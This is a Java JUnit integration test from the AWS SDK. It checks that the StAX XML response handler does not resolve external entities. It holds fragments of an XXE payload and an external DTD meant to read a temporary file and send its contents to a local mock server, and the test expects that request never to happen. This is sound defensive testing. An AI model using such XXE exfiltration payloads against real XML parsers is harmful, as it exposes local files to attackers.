/*
* Copyright (c) 2017. Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
package com.amazonaws.http;
import static com.github.tomakehurst.wiremock.client.WireMock.aResponse;
import static com.github.tomakehurst.wiremock.client.WireMock.get;
import static com.github.tomakehurst.wiremock.client.WireMock.getRequestedFor;
import static com.github.tomakehurst.wiremock.client.WireMock.stubFor;
import static com.github.tomakehurst.wiremock.client.WireMock.urlPathEqualTo;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.CoreMatchers.equalTo;
import static org.mockito.Mockito.*;
import com.amazonaws.AmazonWebServiceResponse;
import com.amazonaws.transform.StaxUnmarshallerContext;
import com.amazonaws.transform.Unmarshaller;
import com.github.tomakehurst.wiremock.client.VerificationException;
import com.github.tomakehurst.wiremock.client.WireMock;
import com.github.tomakehurst.wiremock.junit.WireMockRule;
import org.junit.Rule;
import org.junit.Test;
import org.junit.rules.TemporaryFolder;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.io.PrintWriter;
import java.nio.charset.Charset;
import javax.xml.stream.events.XMLEvent;
public class StaxResponseHandlerIntegrationTest {
@Rule
public WireMockRule wireMockServer = new WireMockRule(0);
@Rule
public TemporaryFolder temporaryFolder = new TemporaryFolder();
@Test(expected = VerificationException.class)
public void saxParserShouldNotExposeLocalFileSystem() throws Exception {
File tmpFile = temporaryFolder.newFile("contents.txt");
writeToTmpFile(tmpFile, "hello-world");
String payload = " \n" +
" \n" +
"%asd; \n" +
"%c; \n" +
"]> \n" +
"&rrr;";
String entityString = " \n" +
"\">";
stubFor(get(urlPathEqualTo("/payload.dtd")).willReturn(aResponse().withBody(entityString)));
stubFor(get(urlPathEqualTo("/?hello-world")).willReturn(aResponse()));
StaxResponseHandler responseHandler = new StaxResponseHandler(dummyUnmarshaller());
HttpResponse response = mock(HttpResponse.class);
when(response.getContent()).thenReturn(new ByteArrayInputStream(payload.getBytes(Charset.forName("UTF-8"))));
try {
responseHandler.handle(response);
} catch (Exception e) {
//expected
}
WireMock.verify(getRequestedFor(urlPathEqualTo("/?hello-world"))); //We expect this to fail, this call should not be made
}
@SuppressWarnings("unchecked")
private Unmarshaller dummyUnmarshaller() {
return new Unmarshaller() {
@Override
public String unmarshall(StaxUnmarshallerContext in) throws Exception {
while(!in.nextEvent().isEndDocument()) {
//read the whole document
}
return "Success";
}
};
}
private void writeToTmpFile(File tmpFile, String contents) throws FileNotFoundException {
PrintWriter writer = null;
try {
writer = new PrintWriter(tmpFile);
writer.write(contents);
writer.flush();
} finally {
if (writer != null) {
writer.close();
}
}
}
}